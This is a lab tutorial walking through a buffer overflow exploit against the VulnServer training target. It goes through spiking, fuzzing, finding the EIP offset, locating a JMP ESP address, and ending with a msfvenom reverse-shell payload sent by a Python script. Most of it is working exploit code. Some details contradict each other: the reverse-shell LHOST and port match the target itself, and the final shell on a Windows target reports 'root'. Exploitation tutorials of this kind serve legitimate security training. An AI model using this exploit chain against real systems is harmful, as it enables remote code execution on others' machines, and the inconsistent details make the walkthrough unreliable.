- Prerequisites
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding bad characters
- Finding the right module
- Generating shellcode
First, connect to VulnServer using netcat: `nc -nv 192.168.0.105 9999`. Type `HELP` to review the commands the server accepts. We use generic_send_tcp (from SPIKE) to send our payload. Prepare two .spk files: one for spiking the STATS command and one for the TRUN command.

stats.spk:

```
s_readline();
s_string("STATS ");
s_string_variable("0");
```

trun.spk:

```
s_readline();
s_string("TRUN ");
s_string_variable("0");
```

```bash
generic_send_tcp 192.168.0.105 9999 stats.spk 0 0
generic_send_tcp 192.168.0.105 9999 trun.spk 0 0
```
```python
#!/usr/bin/python
# Python 2: str is a byte string, so payloads can be built from plain string literals.
import sys, socket
from time import sleep

buffer = 'A' * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.0.105', 9999))   # the port must be an int, not the string '9999'
        s.send('TRUN /.:/' + buffer)
        s.close()
        sleep(1)
        buffer = buffer + 'A' * 100          # grow the payload by 100 bytes each round
    except:
        # A failed connection means the service crashed on the previous send.
        print "Fuzzing crashed at %s bytes." % str(len(buffer))
        sys.exit()
```
By executing this script we see that the server crashes at 2700 ‘A’ characters.

```bash
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```

This Metasploit script creates a non-repeating pattern of 3000 characters that is used to detect the offset. To send this pattern we need to modify our previous script.
```python
#!/usr/bin/python
import sys, socket

offset = 'insert pattern here'   # paste the pattern_create.rb output here

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))   # port as an int
    s.send('TRUN /.:/' + offset)
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```
In Immunity Debugger we see that the EIP register displays “386F4337”. Using another tool from Metasploit’s scripts, we can get the exact offset by providing the value from EIP.

```bash
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337
```

This results in “Exact match at offset 2003”.
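To make the offset step reproducible without Metasploit, here is an added Python 3 reimplementation of what pattern_create.rb and pattern_offset.rb do (not part of the original walkthrough or of Metasploit's own code): it builds the same upper/lower/digit cyclic pattern and looks up the EIP value, trying little-endian byte order first because that is how x86 stores the four bytes that land in EIP.

```python
import itertools
import string

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# 26 * 26 * 10 three-character chunks before the sequence would repeat
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3


def pattern_create(length):
    """Cyclic pattern in the style of pattern_create.rb: Aa0Aa1Aa2 ... Zz9."""
    if length > MAX_LEN:
        raise ValueError("length exceeds the unique pattern space of %d bytes" % MAX_LEN)
    pat = "".join(u + l + d for u, l, d in itertools.product(UPPER, LOWER, DIGITS))
    return pat[:length]


def pattern_offset(length, eip_hex):
    """Offset of the four pattern bytes that ended up in EIP.

    eip_hex is the register value as the debugger shows it, e.g. "386F4337".
    Returns -1 if the value is not part of the pattern (e.g. a mistyped value).
    """
    raw = bytes.fromhex(eip_hex)
    pat = pattern_create(length)
    # Little-endian first (debugger shows bytes reversed relative to the buffer),
    # then the as-is order as a fallback.
    for candidate in (raw[::-1], raw):
        try:
            needle = candidate.decode("ascii")
        except UnicodeDecodeError:
            continue
        idx = pat.find(needle)
        if idx != -1:
            return idx
    return -1


if __name__ == "__main__":
    # The value from the walkthrough resolves to the same offset pattern_offset.rb reports.
    print(pattern_offset(3000, "386F4337"))   # 2003
```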
Again, we modify our Python script, this time using the exact offset we found.
```python
#!/usr/bin/python
import sys, socket

# 2003 bytes of padding reach the saved return address; the 4 'B's should land in EIP.
shellcode = 'A' * 2003 + 'B' * 4

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))   # port as an int
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```
Knowing the hex codes of the characters ‘A’ and ‘B’, 41 and 42 respectively, we can check whether EIP is being overwritten correctly.
After executing the script, EIP is overwritten with our four ‘B’ characters, resulting in “42424242”.
We modify our script again by appending all potential bad characters (every byte value from \x01 to \xff) to our shellcode. Then we look at the hexdump section in Immunity.
Any disruption in the sequence is a sign of a bad character.
By copying the [mona.py](http://mona.py) script into Immunity’s PyCommands folder, we can search for usable DLLs by typing `!mona modules` in the command bar at the bottom. A module has no memory protection if it shows False for all of Rebase, SafeSEH, ASLR, NXCompat and OS DLL. On Kali, there is a tool called nasm_shell that translates assembly instructions into their opcode bytes. Using nasm we can generate the hex equivalent of `JMP ESP`, which is `FFE4`. Again in Immunity, we type `!mona find -s "\xff\xe4" -m essfunc.dll`. After we’ve run the command, we copy the address of the JMP ESP instruction found in that module, 625011af, and use it to modify our script again. Because x86 is little-endian, the address is written into the script with its bytes reversed.
```python
#!/usr/bin/python
import sys, socket

# 625011af (JMP ESP in essfunc.dll) written in little-endian byte order
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))   # port as an int
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```
Before running the script, set a breakpoint on the address 625011af so Immunity stops there. Now we can see that the jump has been successful: EIP holds our address and execution continues at ESP.

Generate the reverse shell payload with msfvenom, encoding around the null byte found to be a bad character:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=9999 EXITFUNC=thread -f c -a x86 -b "\x00"
```
```python
#!/usr/bin/python
import sys, socket

overflow = "Insert generated payload here."   # paste the msfvenom output here
spaces = "\x90" * 32                          # NOP sled so the jump can land slightly off

# padding + JMP ESP address (little-endian) + NOP sled + payload
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62' + spaces + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))   # port as an int
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```
```
whoami
root
```